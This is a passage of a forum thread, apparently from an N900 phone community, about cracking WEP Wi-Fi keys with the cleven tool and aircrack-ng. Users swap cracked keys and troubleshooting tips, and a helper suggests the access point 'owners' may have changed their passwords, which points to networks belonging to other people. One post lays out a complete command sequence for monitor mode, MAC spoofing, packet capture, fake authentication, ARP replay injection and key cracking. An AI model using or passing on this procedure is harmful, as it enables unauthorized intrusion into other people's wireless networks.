Active Topics

 



Notices


Reply
Thread Tools
Posts: 37 | Thanked: 6 times | Joined on Mar 2010
#161
I have a weird problem. I tried to descript two AP, got 50k of data. Descripting was fast, but i get wrong passwords (6C656E6B61 and
6A61726461). Passwords don't works. Do you know where is problem? Thanks
 
Posts: 915 | Thanked: 57 times | Joined on Jun 2011
#162
thnk u.it worked.i could successfully cracked the wep
 
pusak gaoq's Avatar
Posts: 723 | Thanked: 519 times | Joined on Nov 2010 @ Kuching:Malaysia
#163
Originally Posted by Honza. View Post
I have a weird problem. I tried to descript two AP, got 50k of data. Descripting was fast, but i get wrong passwords (6C656E6B61 and
6A61726461). Passwords don't works. Do you know where is problem? Thanks
hmmm...two reason why the passwords didnt works....

1.you wrongly enter the passwords = you need re-enter the password correctly...since the passwords is in HEX formats then all alphabet must be enter in capital...

2.They change the password = The owners of the AP might change the password right after you have decrypt it....

try capture/decrypt the AP again & see if the passwords do change or not...
__________________
My Phone Evolution : Nokia 3650-Nokia 6600-Nokia 6630-Motorola Rizr-Sony P1i-Nokia E63-Nokia X3-Samsung E980-Iphone 2G-Sony W595-Nokia E71-Nokia 5800-Nokia N900-HTC Hero-Xperia Mini Pro
 
Posts: 915 | Thanked: 57 times | Joined on Jun 2011
#164
one BIG problem.i cannot connect via 2G.after this.i rebooted the phone.now everytym i connect via 2G it works but after few seconds it disconnects automatically saying cellular network unavailable but the network bar is full.this problem happened after i cracked WEP.but rebooted my phone.plzzz help
 
pusak gaoq's Avatar
Posts: 723 | Thanked: 519 times | Joined on Nov 2010 @ Kuching:Malaysia
#165
Originally Posted by trisha02 View Post
one BIG problem.i cannot connect via 2G.after this.i rebooted the phone.now everytym i connect via 2G it works but after few seconds it disconnects automatically saying cellular network unavailable but the network bar is full.this problem happened after i cracked WEP.but rebooted my phone.plzzz help
those were not cause by cleven or by any cracking AP programs....
it just happen your 2G networks got coverage problem...it will be fixed by your networks in due time...
__________________
My Phone Evolution : Nokia 3650-Nokia 6600-Nokia 6630-Motorola Rizr-Sony P1i-Nokia E63-Nokia X3-Samsung E980-Iphone 2G-Sony W595-Nokia E71-Nokia 5800-Nokia N900-HTC Hero-Xperia Mini Pro
 
Posts: 915 | Thanked: 57 times | Joined on Jun 2011
#166
thnx for replying so soon.anyways i am browisng now.not facing any problem.sorry for bothering :P
 
Posts: 87 | Thanked: 4 times | Joined on Sep 2010
#167
when windows of ap for capture, need 30k of beacons or data?

i try to capture but i take only 2k data! then stop to receive data, and about in 2 hours..
 
Saturn's Avatar
Posts: 1,648 | Thanked: 2,122 times | Joined on Mar 2007 @ UNKLE's Never Never Land
#168
Originally Posted by colla84 View Post
when windows of ap for capture, need 30k of beacons or data?

i try to capture but i take only 2k data! then stop to receive data, and about in 2 hours..
There is some links for you to read on the first post about aircrack. IIRC the FAQ there answers your question already.
 

The Following User Says Thank You to Saturn For This Useful Post:
razefox's Avatar
Posts: 120 | Thanked: 22 times | Joined on Jan 2010
#169
My phone became completely bugged and slow after installing cleven and I needed to reflash my n900. Iam scared to install it again :/
 
Posts: 435 | Thanked: 197 times | Joined on Feb 2010
#170
Originally Posted by pusak gaoq View Post
follow these step....
<...>
7.then press the capture button below the AP list.....
8. a x-term will popup to show the capture to that AP....look carefully at the data...if the data keep getting collected then just waits until the data is at 30k-50k....this show that the AP is active...
<...>
10a.if the AP is active & the data is collected at 30k-50k then go back to cleven menu (closed the x-term) then press the cleven status bar & select decrypt captured
<...>
Please anybody correct me if I'm wrong (I'm still a little new at networking), but I thought you had to Capture, Authenticate, AND Inject every single time... These are the steps I used to do before the GUI was created (again, please correct me if I'm mistaken):

01) cd MyDocs/wl1251-maemo/binary/compat-wireless
02) sh load.sh
03) *Open new root xterm*
04) ifconfig wlan0 up
05) iwlist wlan0 scan
06) *copy target mac address*
07) ifconfig wlan0 down
08) iwconfig wlan0 mode monitor
09) macchanger -r wlan0 |grep Faked
10) ifconfig wlan0
11) ifconfig wlan0 up
12) airodump-ng -c 8 -w [filename] wlan0
13) *open new root xterm session*
14) aireplay-ng -1 0 -a [paste MAC here] wlan0
15) aireplay-ng -3 -b [paste MAC here] wlan0
16) *open new root xterm session*
17) aircrack-ng [filename]-01.cap
18) *open new root xterm session*
19) aireplay-n -2 -p 0841 -a [MAC]

When the GUI came out, I began understanding a little more of what I was doing and why, but I'm still not catching 100% of it :s
 
Reply

Tags
aircrack, cleven, reaver


 
Forum Jump


All times are GMT. The time now is 02:07.